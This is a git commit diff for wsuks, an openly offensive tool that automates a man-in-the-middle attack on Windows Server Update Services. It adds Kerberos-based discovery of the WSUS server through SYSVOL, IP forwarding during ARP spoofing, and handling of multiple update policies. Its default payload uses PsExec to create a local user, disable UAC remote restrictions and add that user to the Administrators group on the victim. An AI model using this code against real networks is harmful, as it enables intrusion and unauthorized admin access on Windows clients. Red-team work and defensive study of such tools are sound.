Merge branch 'master' of https://github.com/NeffIsBack/wsuks

NeffIsBack · NeffIsBack · commit eec2df104e22 · 2025-06-23T18:33:47.000-04:00
diff --git a/README.md b/README.md
@@ -55,10 +55,10 @@ There are 3 different modes/attack scenarios in which wsuks can be run, which ar
 If the WSUS server is already known, you can simply specify the target IP and the WSUS server IP.\
 The default executable is PsExec64.exe, which runs a predefined PowerShell script with the following actions:
 1. Create a new user of the format user[0-9]{5} (e.g. user12345) and a random password
-2. Set the LocalAccountTokenFilterPolicy to 1 (disabling UAC)
+2. Set the LocalAccountTokenFilterPolicy to 1 (disabling UAC ⚠)
 3. Add the created user to the local admin group
 
-Before setting the LocalAccountTokenFilterPolicy to 1, the original value is stored in the user description field so that it can be restored later.
+⚠ Before setting the LocalAccountTokenFilterPolicy to 1, the original value is stored in the user description field so that it can be restored later
 
 ```shell
 sudo wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20
diff --git a/pyproject.toml b/pyproject.toml
@@ -1,6 +1,6 @@
 [project]
 name = "wsuks"
-version = "0.5.0"
+version = "1.0.0"
 description = "Automating the MITM attack on WSUS"
 authors = [
     {name = "Alexander Neff",email = "alex99.neff@gmx.de"}
diff --git a/wsuks/helpers/argparser.py b/wsuks/helpers/argparser.py
@@ -35,7 +35,7 @@ def initParser():
     parser.add_argument("--debug", action="store_true", help="Enable debug output")
     parser.add_argument("-ts", "--timestamp", action="store_true", help="Add timestamp to log messages")
 
-    parser.add_argument("-t", "--target-ip", metavar="", dest="targetIp", help="IP Address of the victim Client. (REQUIRED)", required=True)
+    parser.add_argument("-t", "--target-ip", metavar="", dest="targetIp", help="IP Address of the victim Client. (REQUIRED)", required="--only-discover" not in parser.parse_known_args()[1])
     parser.add_argument("-I", "--interface", metavar="", help="Network Interface to use. (DEFAULT: %(default)s)", default="eth0")
     parser.add_argument("-e", "--executable", metavar="", default=f"{dirname(wsuks.__file__)}/executables/PsExec64.exe", type=argparse.FileType("rb"), help="The executable to returned to the victim. It has to be signed by Microsoft (DEFAULT: %(default)s)")
     parser.add_argument("-c", "--command", metavar="", default='/accepteula /s powershell.exe "{CREATE_USER_COMMAND}Add-LocalGroupMember -Group $(Get-LocalGroup -SID S-1-5-32-544 | Select Name) -Member {WSUKS_USER};"', help="The command to execute on the victim. \n(DEFAULT (details see README): %(default)s)",)
@@ -45,6 +45,8 @@ def initParser():
     simple.add_argument("-p", "--password", metavar="", help="Password to authenticate with")
     simple.add_argument("--dc-ip", metavar="", dest="dcIp", help="IP Address of the domain controller")
     simple.add_argument("-d", "--domain", metavar="", help="Domain to authenticate with")
+    simple.add_argument("-k", "--kerberos", action="store_true", help="Use Kerberos authentication instead of NTLM")
+    simple.add_argument("--dc-name", metavar="", dest="dcName", help="Domain Controller Name to authenticate with, required for Kerberos authentication", required=parser.parse_known_args()[0].kerberos)
     simple.add_argument("--only-discover", action="store_true", help="Only discover the WSUS Server and exit")
 
     advanced = parser.add_argument_group("MANUAL MODE", "If you know the WSUS Server, you can use this mode to skip the automatic discovery.")
diff --git a/wsuks/helpers/arpspoofer.py b/wsuks/helpers/arpspoofer.py
@@ -1,5 +1,6 @@
 from ipaddress import ip_address, IPv4Network
 import logging
+from pathlib import Path
 import sys
 import time
 import traceback
@@ -21,6 +22,7 @@ def __init__(self, interface):
         self.targetIp = None
         self.targetMac = None
         self.spoofIp = None
+        self.ip_forwarding = None
 
     def _spoof(self, targetIp, spoofIp):
         """
@@ -85,12 +87,12 @@ def check_spoofIp_subnet(self, targetIp, spoofIp):
         """
         net_mask = ni.ifaddresses(self.interface)[ni.AF_INET][0]["netmask"]
         interface_ip = get_if_addr(self.interface)
-        subnet = IPv4Network(interface_ip + "/" + net_mask, False)
+        self.subnet = IPv4Network(interface_ip + "/" + net_mask, False)
 
-        if ip_address(targetIp) not in subnet:
+        if ip_address(targetIp) not in self.subnet:
             self.logger.critical(f"Target IP address {targetIp} is not in the same subnet as the host! Forgot -I? Exiting...")
             sys.exit(1)
-        elif ip_address(spoofIp) not in subnet:
+        elif ip_address(spoofIp) not in self.subnet:
             gateway = self.get_default_gateway_ip(self.interface)
             if not gateway:
                 self.logger.critical(f"WSUS IP address {spoofIp} is not in the same subnet and {self.interface} has no gateway!")
@@ -102,6 +104,21 @@ def check_spoofIp_subnet(self, targetIp, spoofIp):
         else:
             return spoofIp
 
+    def enable_ip_forwarding(self):
+        """Enable IP forwarding if the the spoofed IP address is not in the same subnet as the host."""
+        # Read ip_fowarding setting and enable it if necessary
+        self.ip_forwarding = Path("/proc/sys/net/ipv4/ip_forward").read_text().strip()
+
+        if self.ip_forwarding == "0":
+            self.logger.warning("IP fowarding not enabled, enabling now")
+            Path("/proc/sys/net/ipv4/ip_forward").write_text("1")
+
+    def disable_ip_forwarding(self):
+        """Disable IP forwarding if it was enabled before."""
+        if self.ip_forwarding == "0":
+            self.logger.warning("Restoring: Disabling IP fowarding")
+            Path("/proc/sys/net/ipv4/ip_forward").write_text("0")
+
     def start(self, targetIp, spoofIp):
         """
         Start the ARP spoofing process.
@@ -113,6 +130,10 @@ def start(self, targetIp, spoofIp):
         self.spoofIp = self.check_spoofIp_subnet(targetIp, spoofIp)
         self.isRunning = True
 
+        # If we arp spoof the router enable IP forwarding, so that the target still has network access.
+        if ip_address(spoofIp) not in self.subnet:
+            self.enable_ip_forwarding()
+
         self.logger.info(f"Starting ARP spoofing for target {self.targetIp} and spoofing IP address {self.spoofIp}")
         t1 = Thread(target=self._spoof, args=(self.targetIp, self.spoofIp))
         t1.start()
@@ -123,5 +144,8 @@ def stop(self):
             self.logger.info(f"Stopping ARP spoofing for target {self.targetIp}")
             self.isRunning = False
             self._restore(self.targetIp, self.spoofIp)
+
+            # Restore IP forwarding if it was enabled before
+            self.disable_ip_forwarding()
         else:
             self.logger.error("ARP spoofing is not running")
diff --git a/wsuks/helpers/sysvolparser.py b/wsuks/helpers/sysvolparser.py
@@ -24,16 +24,19 @@ def __init__(self):
         self.dcIp = ""
         self.domain = ""
 
-    def _createSMBConnection(self, domain, username, password, dcIp, kerberos=False, lmhash="", nthash="", aesKey=""):
+    def _createSMBConnection(self, domain, username, password, dcIp, kerberos=False, dcName="", lmhash="", nthash="", aesKey=""):
         """Create a SMB connection to the target"""
         # SMB Login would be ready for kerberos or NTLM Hashes Authentication if it is needed
         # TODO: Fix remoteName in SMBConnection if this is a bug
         # TODO: Add Kerberos Authentication
         try:
-            self.conn = SMBConnection(remoteName=dcIp, remoteHost=dcIp, sess_port=445)
+            if kerberos:
+                self.conn = SMBConnection(remoteName=dcName, remoteHost=dcIp, sess_port=445)
+            else:
+                self.conn = SMBConnection(remoteName=dcIp, remoteHost=dcIp, sess_port=445)
 
             if kerberos is True:
-                self.conn.kerberosLogin(username, password, domain, lmhash, nthash, aesKey, dcIp)
+                self.conn.kerberosLogin(username, password, domain, lmhash, nthash, aesKey, dcIp, useCache=False)
             else:
                 self.conn.login(username, password, domain, lmhash, nthash)
             if self.conn.isGuestSession() > 0:
@@ -53,6 +56,8 @@ def _extractWsusServerSYSVOL(self):
         def output_callback(data):
             self.reg_data += data
 
+        possible_wsus_locations = []
+
         policies = self.conn.listPath("SYSVOL", f"{self.domain}/Policies/*")
         for policy in policies:
             try:
@@ -62,26 +67,36 @@ def output_callback(data):
                 for pol in reg_pol:
                     if pol["key"] == "Software\\Policies\\Microsoft\\Windows\\WindowsUpdate" and pol["value"] == "WUServer":
                         try:
-                            scheme, hostname, wsusPort = re.search(r"^(https?)://(.+):(\d+)$", pol["data"]).groups()
-                            if scheme == "http":
-                                self.logger.success(f"Found vulnerable WSUS Server using HTTP: {scheme}://{hostname}:{wsusPort}")
-                                return hostname, wsusPort
-                            elif scheme == "https":
-                                self.logger.critical(f"Found WSUS Server using HTTPS: {scheme}://{hostname}:{wsusPort}")
-                                self.logger.critical("This is not vulnerable to WSUS Attack. Exiting...")
-                                sys.exit(1)
+                            scheme, host, wsusPort = re.search(r"^(https?)://(.+):(\d+)$", pol["data"]).groups()
+                            possible_wsus_locations.append({"name": policy.get_shortname(), "scheme": scheme, "host": host, "port": int(wsusPort)})
                         except Exception as e:
-                            self.logger.error(f"Found WSUS Policy, but could not parse value: {e}")
-                            self.logger.error(f"Policy: {pol}")
+                            self.logger.error(f"Could not parse WSUS Policy (error: {e}): {pol}")
             except SessionError as e:
                 self.logger.debug(f"Error: {e}")
             except Exception as e:
                 self.logger.error(f"Error: {e}")
                 if self.logger.level == logging.DEBUG:
                     traceback.print_exc()
+
+        # Check if we found any WSUS Policies
+        if not possible_wsus_locations:
+            self.logger.error("Error: No WSUS policies found in SYSVOL Share.")
+        elif len(possible_wsus_locations) == 1:
+            if scheme == "http":
+                self.logger.success(f"Found vulnerable WSUS Server using HTTP: {scheme}://{host}:{wsusPort}")
+                return host, wsusPort
+            elif scheme == "https":
+                self.logger.critical(f"Found WSUS Server using HTTPS: {scheme}://{host}:{wsusPort}")
+                self.logger.critical("Not vulnerable to WSUS Attack. Exiting...")
+                sys.exit(1)
+        elif len(possible_wsus_locations) > 1:
+            self.logger.warning("Found multiple WSUS Policies, please specify the WSUS Server manually with --WSUS-Server and --WSUS-Port.")
+            for policy in possible_wsus_locations:
+                self.logger.warning(f"Found WSUS Server Policy '{policy['name']}', target URL: {policy['scheme']}://{policy['host']}:{policy['port']}")
+
         return None, None
 
-    def findWsusServer(self, domain, username, password, dcIp) -> tuple[str, int]:
+    def findWsusServer(self, domain, username, password, dcIp, kerberos, dcName) -> tuple[str, int]:
         """
         Get the WSUS server IP address from GPOs of the SYSVOL share
 
@@ -101,20 +116,21 @@ def findWsusServer(self, domain, username, password, dcIp) -> tuple[str, int]:
         self.domain = domain
 
         try:
-            if self._createSMBConnection(domain, username, password, dcIp):
-                hostname, self.wsusPort = self._extractWsusServerSYSVOL()
-                # Check if hostname is an IP Address, if not resolve it
-                try:
-                    self.wsusIp = str(ip_address(hostname))
-                except ValueError:
-                    self.logger.debug(f"Hostname '{hostname}' is not an IP Address, trying to resolve hostname.")
+            if self._createSMBConnection(domain, username, password, dcIp, kerberos, dcName):
+                host, self.wsusPort = self._extractWsusServerSYSVOL()
+    
+                # Check if host is an IP Address, if not resolve it
+                if host and self.wsusPort:
                     try:
-                        self.wsusIp = socket.gethostbyname(hostname)
-                    except socket.gaierror:
-                        self.logger.error(f"Error: Could not resolve hostname '{hostname}'.")
+                        self.wsusIp = str(ip_address(host))
+                    except ValueError:
+                        self.logger.debug(f"Host '{host}' is not an IP Address, trying to resolve host.")
+                        try:
+                            self.wsusIp = socket.gethostbyname(host)
+                        except socket.gaierror:
+                            self.logger.error(f"Error: Could not resolve host '{host}'.")
         except Exception as e:
-            self.logger.error(f"Error: {e}")
-            self.logger.error("Error while looking for WSUS Server in SYSVOL Share.")
+            self.logger.error(f"Error while looking for WSUS Server in SYSVOL Share: {e}")
             if self.logger.level == logging.DEBUG:
                 traceback.print_exc()
         finally:
diff --git a/wsuks/wsuks.py b/wsuks/wsuks.py
@@ -22,7 +22,11 @@ def __init__(self, args):
 
         self.logger = logging.getLogger("wsuks")
         self.interface = args.interface
-        self.hostIp = get_if_addr(self.interface)
+        try:
+            self.hostIp = get_if_addr(self.interface)
+        except ValueError:
+            self.logger.error(f"Interface '{args.interface}' not found! Exiting...")
+            exit(1)
         self.local_username = "user" + "".join(random.choice(digits) for i in range(5))
         self.local_password = "".join(random.sample(ascii_letters, 16))
 
@@ -60,19 +64,20 @@ def __init__(self, args):
         self.domain_password = args.password
         self.domain = args.domain
         self.dcIp = args.dcIp
+        self.kerberos = args.kerberos
+        self.dcName = args.dcName
 
     def run(self):
         # Get the WSUS server IP and Port from the sysvol share
         sysvolparser = SysvolParser()
         if not self.wsusIp:
             self.logger.info("WSUS Server not specified, trying to find it in SYSVOL share on DC")
-            self.wsusIp, self.wsusPort = sysvolparser.findWsusServer(self.domain, self.domain_username, self.domain_password, self.dcIp)
+            self.wsusIp, self.wsusPort = sysvolparser.findWsusServer(self.domain, self.domain_username, self.domain_password, self.dcIp, self.kerberos, self.dcName)
         else:
             self.logger.info(f"WSUS Server specified manually: {self.wsusIp}:{self.wsusPort}")
 
         if self.args.only_discover:
-            self.logger.info(f"WSUS Server found: {self.wsusIp}:{self.wsusPort}")
-            self.logger.info("Exiting...")
+            self.logger.info("Discovered WSUS Server, Exiting...")
             return
 
         self.logger.info("===== Setup done, starting services =====")
